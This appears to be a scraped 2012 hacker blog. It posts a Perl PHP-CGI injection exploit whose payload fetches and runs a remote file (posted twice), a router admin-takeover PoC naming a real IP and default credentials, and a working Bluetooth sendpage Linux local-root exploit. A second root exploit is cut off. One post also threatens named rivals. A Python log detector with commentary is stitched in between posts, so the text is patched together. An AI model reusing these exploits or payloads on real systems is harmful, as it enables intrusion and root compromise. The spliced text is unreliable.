
[Exploit Updated]: PHP CGI – executes a payload which is php shellexec(); My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but this is only a basic version which, I guess, does things in a nice way :)

It is my 3rd Perl exploit, so please don't bash me; any fixes etc. would be appreciated, BUT remember it is using the RIGHT method, i.e. injecting PHP by shellexec()

which IS a PHP CGI function, and the ONLY way it will definitely exec!

ALSO this CAN execute cmds of course; I will add in a line if you wish to do this.. ok…

Ok now on with the show….

 


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick :P 

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–
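The request the script above builds carries php-cgi command-line switches in the query string: a query with no unencoded `=` is split on `+` and handed to the CGI binary as argv, so `-d allow_url_include=On -d auto_prepend_file=...` reaches php-cgi as options. The detector below is an added example (not the post's code) that reconstructs that argv from Apache access-log request lines and flags the switches and ini directives involved; the log lines and the set of switches of interest are constructed assumptions.

```python
"""Flag php-cgi argument injection (query strings that become php-cgi argv) in
Apache access-log request lines.  Added example; sample log lines are constructed."""
import re
from typing import Optional
from urllib.parse import unquote

# php-cgi switches that matter when they arrive from the network (assumed set of
# interest for a defender, not an exhaustive list of php-cgi's options).
PHP_CGI_SWITCHES = {"-d", "-s", "-n", "-c", "-T", "-h", "-i"}

# ini directives whose remote override is the core of the technique
SENSITIVE_INI = re.compile(
    r"(allow_url_include|allow_url_fopen|auto_prepend_file|auto_append_file|"
    r"disable_functions|open_basedir|safe_mode|cgi\.force_redirect)", re.I)

# request line inside a combined/common log entry: "METHOD target HTTP/x.y"
REQ_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"')


def cgi_argv(target: str) -> list:
    """Return the argv words a CGI server derives from a request target.

    Per the CGI spec (Apache's mod_cgi behaves this way) the query string is
    only turned into command-line arguments when it contains no unencoded '='.
    Each '+'-separated word is URL-decoded after the split, which is why
    '-d%20allow_url_include%3DOn' reaches php-cgi as one argv entry and why
    '%2d' is as good as a literal dash.
    """
    if "?" not in target:
        return []
    query = target.split("?", 1)[1]
    if "=" in query:
        return []          # ordinary form query: exported as QUERY_STRING only
    return [unquote(word) for word in query.split("+") if word]


def classify(target: str) -> Optional[dict]:
    """Return a finding for a target that carries switches via argv, else None."""
    argv = cgi_argv(target)
    switches = sorted({w[:2] for w in argv if w.startswith("-")})
    if not switches:
        return None
    ini = sorted({m.group(1).lower() for w in argv for m in SENSITIVE_INI.finditer(w)})
    known = bool(set(switches) & PHP_CGI_SWITCHES)
    return {
        "severity": "high" if known or ini else "low",
        "switches": switches,
        "ini": ini,
        "argv": argv,
    }


def scan_log(lines) -> list:
    """Return (line_number, method, finding) for every flagged request line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQ_LINE.search(line)
        if not m:
            continue
        finding = classify(m.group("target"))
        if finding:
            findings.append((lineno, m.group("method"), finding))
    return findings


# Constructed sample log (not real traffic).  Line 1 mirrors the request shape
# built by the Perl script; line 2 is the source-disclosure variant with the
# dash encoded; lines 3 and 4 are benign.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/May/2012:10:00:01 +0000] "POST //cgi-bin/?-d%20allow_url_include%3DOn'
    '+-d%20auto_prepend_file%3Dhttp://example.invalid/x.txt HTTP/1.1" 200 311 "-" "-"',
    '192.0.2.10 - - [06/May/2012:10:00:02 +0000] "GET /index.php?%2ds HTTP/1.1" 200 4123 "-" "-"',
    '198.51.100.7 - - [06/May/2012:10:00:03 +0000] "GET /index.php?page=-d+foo HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.7 - - [06/May/2012:10:00:04 +0000] "GET /cgi-bin/search?apple+pie HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for lineno, method, finding in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {method} severity={finding['severity']} "
              f"switches={finding['switches']} ini={finding['ini']}")
```

The `=`-free-query condition in `cgi_argv` is the same one the rewrite rule PHP published alongside its fix keys on, so a request that this flags is one that rule would have rejected.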

[Exploit]: PHP CGI exec-cmd/injection of php-code thru phptags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but this is only a basic version which, I guess, does things in a nice way :)

It is my 3rd Perl exploit, so please don't bash me; any fixes etc. would be appreciated, BUT remember it is using the RIGHT method, i.e. injecting PHP by shellexec()

which IS a PHP CGI function, and the ONLY way it will definitely exec!

Ok now on with the show….


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage:\n";
print "$0 <Host> <Cmd [Ex: id]>\n";
exit(-1);
}
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

 

Enjoy / xd–

PoC : WindWeb/2.0 Server admin add exploit, carnage for ANY .kr/.tw ! Kept pvt for 5yrs… being leaked; well, we owned them now, you can try to reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

I'll make it short and sweet, but I can tell you NOW this is usable across MANY routers, and yes, it DOES matter on some routers whether they enable or disable ports 80/443, which Netgear, and obviously this brand, doesn't :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: Korean HOME routers/BIZ routers ALL affected - noted: 4MB and fast on the ADSL alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass

[IPv6 Stuff]: IPv6 banner grabber… of course this will also get you the IPv4…. thx to r0t0r for this 1

Posted on 19th April 2012 in Codes, Exploits, Papers

Awesome code! Written by a 13-year-old, or well, when rotor was a young tadpole :P ~~

Thanks mate, this is definitely going into the IPv6 toolkit I'll be releasing soon on dd0s.ucoz.com or on bsd-demons.com, anywhere that will have me :0

Love the code, love the reasons why it was made… remember what this is for: grabbing the banner from the Cisco modem if it is using it (usually most hosters do..), and then you would have IPv6 and IPv4 addys… enjoy and thx to rotor but I will possibly try to improve on this.. *TRY*

xd


/*
* c1zc0-cb4n6.c - ipv6 banner grabber
* by rotor  || bsd-demons.com

* stolen for my toolkit by xd :P ~ love ya mate!

* greetz to haxnet,hacked and fuck icer in the ass . and oh, did i forget krashed, ye fuck u to bitch.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

void usage(char *nme);

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in6 target;
    struct hostent *hostname;
    char buff[1024];
    ssize_t n;
    if (argc < 3) {
        usage(argv[0]);
    }
    printf("%s %s\n", argv[1], argv[2]);
    if ((sock = socket(AF_INET6, SOCK_STREAM, 0)) < 0) {
        printf("error creating socket\n");
        exit(0);
    }
    memset((char *)&target, 0, sizeof(target));
    /* resolve the name to an IPv6 address (gethostbyname2 is obsolete but kept as in the original) */
    if ((hostname = gethostbyname2(argv[1], AF_INET6)) == NULL) {
        printf("error gethostbyname2\n");
        exit(0);
    }
    /* the port arrives as a string: convert it before byte-swapping
     * (the original passed the char pointer itself to htons) */
    target.sin6_port = htons((unsigned short)atoi(argv[2]));
    target.sin6_family = AF_INET6;
    memcpy((char *)&target.sin6_addr, hostname->h_addr_list[0], hostname->h_length);
    if (connect(sock, (struct sockaddr *)&target, sizeof(struct sockaddr_in6)) < 0) {
        close(sock);
        exit(1);
    }
    /* read one chunk of the banner, leaving room for the terminator so
     * printf("%s") cannot run past the buffer */
    n = read(sock, buff, sizeof(buff) - 1);
    if (n < 0) {
        n = 0;
    }
    buff[n] = '\0';
    printf("%s", buff);
    close(sock);
    return 0;
}

void usage(char *nme) {
    printf("%s <Host> <Port>[TRY 23]\n", nme);
    exit(0);
}

and it will not end until everyone has the ability to grab IPv4 from IPv6; there will be NO *hiding*. thx.

XD

LINUX HOSTING/IRC/ANTI-DoS NETWORK ~ GLOWSHELLS.NET IS FINALLY REOPENING!

Posted on 26th March 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

YEP FOLKS IT IS TRUE…

JUST WAITING ON FINALISING 2 OF THE DEDIS/COLOS AND WE ARE UP! THIS IS VERY AWESOME NEWS FOR ANYONE WHO STILL CARES FOR IRC!

YOU CAN BELIEVE IT: GLOW WILL BEAT ANYONE, OFFERING GTCOMM/STAMINUS/HOSTVIRTUAL AND ANOTHER UNNAMED COMPANY FOR ALL HOSTING. THIS INCLUDES SOME WEB HOSTING EVEN, IN SOME SPECIAL CASES; IF THAT'S WHAT IS WANTED THEN GLOW WILL DO IT, IPV6 AND IPV4. THE GTCOMM BOXES ARE IRC/SHOUTCAST/IRCD/ANYTHING-YOU-WANT-ON-IRC BOXES AND, AT THE MOMENT, WE ARE IN THE MIDDLE OF PURCHASING THE DEDIS AND THE COLO BOX :D

REALLY, GLOW COULD HAVE OPENED AGES AGO, BUT THEY JUST WAITED TO GET SOME DECENT IPV4 BACKBONES.. SO I GUESS THEY'RE USABLE, BUT THEY'RE JUST GOING TO ACTUALLY COMPETE SOON… WHICH WILL BE GREAT FOR EFNET, AS IT NEEDS THIS TYPE OF CO.

SOME MEMBERS WHO HAVE BEEN WITH US FOR A WHILE WILL REALLY BE ADMINISTRATING THINGS, ALTHOUGH IT WILL BE ONLY THE SAME OWNER AS BEFORE, *MOUSE_*, WHO WILL BE HANDLING THE MAIN THINGS.

MOST OF IT THEN WILL HAVE AN ADMIN, OR ONE ADMIN AND ONE CO-ADMIN, PER BOX, WHO WILL BE ON CALL 24/7, AND IF NOT YOU GET A 1-MONTH REFUND. YEP, THAT'S THE TRUTH: IF YOU ENTER, AND ARE A CUSTOMER, AND ARE NOT HELPED WITHIN 15 MINUTES OF YOUR CHANNEL STAY, THE MONTH, OR A VHOST, OR SOMETHING, IS AUTOMATICALLY AND MAGICALLY FREE!!! CAN'T BEAT THAT FOR SERVICE; AT LEAST YA KNOW IT'S GONNA BE GOOD!

SINCE THE BOXES ARE IN USA/CANADA/FRANCE/NETHERLANDS/SINGAPORE, WE DECIDED TO MAKE 100% UPTIME BOXES, AND THAT IS SIMPLY USING ONE GTCOMM ADDY, FOR IRC OF COURSE, WHICH SITS ON A 4000GBPS ANTI-DOS NETWORK. IT IS THE BEST GLOW IS ABLE TO DO AND IT IS ALSO THE MOST EXPENSIVE NETWORKING; IT REQUIRES VERY HIGH ID JUST FOR ACCESS AND IS THE MOST EXPENSIVE ROUTE TO TAKE FOR ANY SERVER SETUP I HAVE SEEN… THIS SEEMS LIKE A ROBUST SERVICE, ALREADY BOASTING 400 VHOSTS JUST IN IPV6, HALF OF WHICH ARE NOT EVEN TURNED ON APPARENTLY.. MEANING THEY HAVE SO MUCH THAT THEY REALLY NOW JUST WANT TO MAKE IT SHARED, AND FOR THOSE WHO WANT 100% UPTIME WRAITH BOTPACKS ETC, WELL, HOW CAN YA BEAT A LOGIN WHICH HAS 4 BOXES IN 4 COUNTRIES!! HAHA! YA CAN'T, IT IS PERFECT: YOU CONTROL THEM, YOU HAVE 100% CONTROL.. SO YOU GET A 100% AWESOME PRODUCT IN THE END!!! IT IS AWESOME FOR ANYONE HOSTING WRAITH, AND JUST NOW, AS IT IS ON THE GTCOMM VPS, IT IS ALREADY HOSTING VERY EASILY OVER 5-6 PEOPLE, AND THAT'S WITH OVER 30 WRAITHS NOW.. AND NOT ONE BIT OF LAG.

ALTHOUGH THERE WILL BE A COLO BOX, THIS WON'T BE OPENING FOR AT LEAST ONE MONTH, BUT THE DEDIS WILL OPEN THIS WEEK, AND THE VPS IS ACTUALLY UP AND IS FINE FOR HOSTING, SO GLOW HAVE ALREADY BEEN ACCEPTING NEW PEOPLE WHO ARE SIMPLY FED UP WITH ONE BOX/LOCATION AND/OR SIMPLY KNOW THE DEDICATION GLOWSHELLS HAS ALWAYS HAD TO EFNET.

AS I UNDERSTAND IT, IT WILL BE USING UNDERNET/AUSTNET/EFNET/DALNET/LCIRC/RIZON AND MOST COVERED NETWORKS, WHICH, WELL, I ASSUME WERE THE OLD PLACES USED..

 

I KNOW FOR AUSSIES THIS IS ESPECIALLY COOL, AS ONE OF THE ADMINS IS AN AUSSIE, AND HE IS NOT HALF BAD WHEN YOU ARE ACTUALLY NOT CALLING HIM AN A**E ETC..

 

ANYHOW, FACT IS, GLOWSHELLS HAS BEEN AND ALWAYS WILL BE LIKE NO OTHER, AND AT THE MOMENT IF YOU'RE INTERESTED IN ANYTHING THEN HEAD TO EFNET IRC (IRC.EFNET.ORG), JOIN #GLOWSHELL-SUPPORT AND SIMPLY WAIT, AND, WELL, I'M JUST WAITING TO SEE MOUSE OPPED AGAIN WHERE SHE SHOULD BE :D

 

I THANK PEOPLE ON EFNET, SPECIALLY SOME LIKE, RFS,CYPHER,FUZION,GIZMORE/WECHALL CHALLENGES,SERH,R0X0R,LORDNIKON,D3MON AND EINS AND EVEN JIMIGJ! HECK, YOU ALL HAVE SOMETHING UNIQUE IN SOME WAY…AND, I WILL BE SURE EVEYONE OF YOU IS HELPED…TALI FOR ALL YOUR HELP WITHOUT HARDLY KNOWING ME, WITH THE GTCOMM FAKE CHANNELS LOL)… AND, FUCKS TO ICER AND KRASHED, AND, YOU BOTH KNOW WHY, YOUR FUCKING BOTH BEEN BUSTED, BOTH HELPIN EACH OTHER, AND PEOPLE ARE STILL GETTING BUSTED…NOW, SINCE I HAVE REPORTED MR KRASHED TO GTCOMM, HIS DDOS HAS STOPPED.AND, I STILL DONT EVEN KNOW WHY HE DID NOT SIMPLY, TALK TO ME, LIKE HUMANS DO.

ANYHWO THINK HARD AND TALK FAST ARSEHOLE… BECAUSE, YOUR THE ONLY SOUR GRAPE IN MY MOUTH.

NOW, AS I WAS SAYING, ENJOY THE RETURN OF GLOWSHELLS AND BE NICE AS ALWAYS! HA!

DRU / XD / WORLDWIDE / KRYPTIK / AKA TEAM 0X90 , YEA, BITCHEZ, THE REAL DEAL HAS NEVER BEEN SO IN YA FACE.

 

NOW READ ON…

 

AND ON THE SOUR NOTE:

AS FOR ICER, YOU HAD A PACT WITH SOMEONE TO MAKE SOMETHING, YOU KNOW, SOMETIMES PEOPLE RELY ON THOSE FUNDS,A ND, WERE OF THE THOUGHTS THAT PERHAPS, YOU WERE IN NO PORBLEMS AS, YOU HAD NOT SAID ANYTHING AND, ASSUMED, EVEYTHING WAS GOING FINE, BUT, AS YOU SAW, IT WAS, ABIT OF DISTRUST ON ONE SIDE BUT, YOU HAD THE CHANCE TO TALK TO THE WEB DESIGNER AND INSTEAD YOU GO HAND THE MONEY TO SOME FUCKING YANKEE WHO PROLLY DOESNT NEED IT.

WELL YOU WILL PAY 200X 10, ATLEAST FOR THAT INSULT YOU SHIT HEAD.

AND NO, I DONT THINK YOUR A *FED* BUT, I DEFINATELY WONDER WHY YOU WOULD ALLOW THIS KRASHED FELLOW, WHO IS A KNOWN HBI SNITCHER, TO HAVE SOMUCH DAMNA XCS TO THE BOTS AND, EVEYTHING IT SEEMS ABOUT YOUR MAGICSHELLS FILTH COMPANY..AND OH FUNNY BUT, WHEN I INVESTIGATED THE IPS, I FOUND OMETHING FUNNY…YEA…AND, I WONT MENTION IT HERE BUT LETS JUST SAY, SHAME ON YOU FOR ALLOWING ANYONE TO RUN B OTNET FROM YOUR SHIT YOU MAGGOT. AND REMEMBER WHERE YOU LIVE, AND THEN WHY THEY ARE SO COCKY AND WHERE THEY LIVE.

JUST REMEMBER, I AINT A FUCKING CRIPPLE MOTHERFUCKER, YOU BETTER FIX THINGS VERY DAMN FAST ABOUT THAT 200 BUX WICH WA MEANT TO BE HEADED MY WAY, AND, THATS BUSINESS YOU CALL IT, TO USE ME, AS A GO BETWEEN, SO, I ASSUME YOU DONT SPEAK TO YOUR BOSSES THEN ? YOU JUST SEND IN A COFFEE BOY AND ASK HIM TO ASK THE BOSS YES / COZ YOU SAID, THATS HOW YOU DO BUSINES… AND, AS I SHOWED YOU, AND WILL KEEP SHOWING YOU, IT IS NOT HOW I DO MY BUSINESS, ASFAR AS I SEE IT, IM OWED 200BUX, AND, SURE, YOU CAN HAVE WHATEVER DEIGN YOU WERE ALREADY THINKING, OR SIMPLY, COP THE FINE, WICH IS MORE FUN FOR ME! BELIEVE ME ARSEHOLE, YOU OWN A SHITTY LITTLE INT CAFE I ALREADY TRACKED DOWN, NOW YOUR EVEN CLOSER TO ME THAN EVER…AND, YOU THINK I WONT USE YOUR CASH AGAINST YOU STUPID. WHERE YOU THINK THE PAIN IS GREEK ? EH, ITS ALWAYS IN THE PCKET.. ASK KCOPE, HE HAS NO PCOKETS THANKS TO HIS FUCKUP IN 2K9… AND STILL, WILL NEVER, EVER BE ACCPETED,EVEN IF HE MADE A REMOTE ROOT FOR EVRY OS IN EXISTANCE AND, I WILL BE SURE TO MAKE YOUR REP THE SAME BITCH.

IT IS NOT HARD AND AS I SAID, I JUST HAVE TO SHOWUP TO YOUR FUCKING *ANYWHERE* I LIKE, COZ, IT IS A PUBLIC FUCKING WORLD…AND, SPEAK NICELY TO YOU :)

HEY, I DID NOT SAY ANYTHING ABOUT BEATINGS ETC… I JUST SIMPLY MENTIONED, YOUR PRIORITYS, YOUR WANTS AND LOVES, AND, HOW EASILY THOSE, CAN BE USED AGAINST PEOPLE NOWDAYS AND ALWAYS DAYS.

PF_UNIX sendpage() 2010 2.6.18.el5-dev/2.6.18-164.el5xen/2.6.X depends on socket existing.. this is in 3 parts here: PF_UNIX, PF_ECONET and PF_BLUETOOTH Linux working local root exploits (.c)

Posted on 13th October 2011 in Codes, Exploits

OK, 2 variants, since some idiot 1337sht.com people leaked things they don't yet even know how to make BEST use of, but anyhow.. here, some gifts… and one is special :< Unfortunately it is going to be patched or is patched.. depends on what you also do, but mmap is a big trick; be sure to also remember the UNIX socket problem: you can mmap the null page and it is workable with BSD ;) Yes it's patched, but only with the latest FreeBSD update .. hehe... nasty!

Code for the Bluetooth socket, with fixed mmap... a shitty old vuln which was not really leaked onto exploit places like 1337shit.com or whatever they call themselves... lamers I call them

/* Bluetooth Sendpage socket() local root exploit
 * Linux 2.6.18-128.el5
 * Linux 2.6.9-89.EL
 * Ubuntu 8.10 Linux 2.6.27
 *
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize()  /* use this in 2011! (xd) */

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
// ye dunno why the other idjits are still tryin to nullpage mmap..useless can do it easier like..
    if ((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

Code for the PF_UNIX sendpage() socket (my version):

/* UNIX socket() local root exploit (OS Portable version)
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
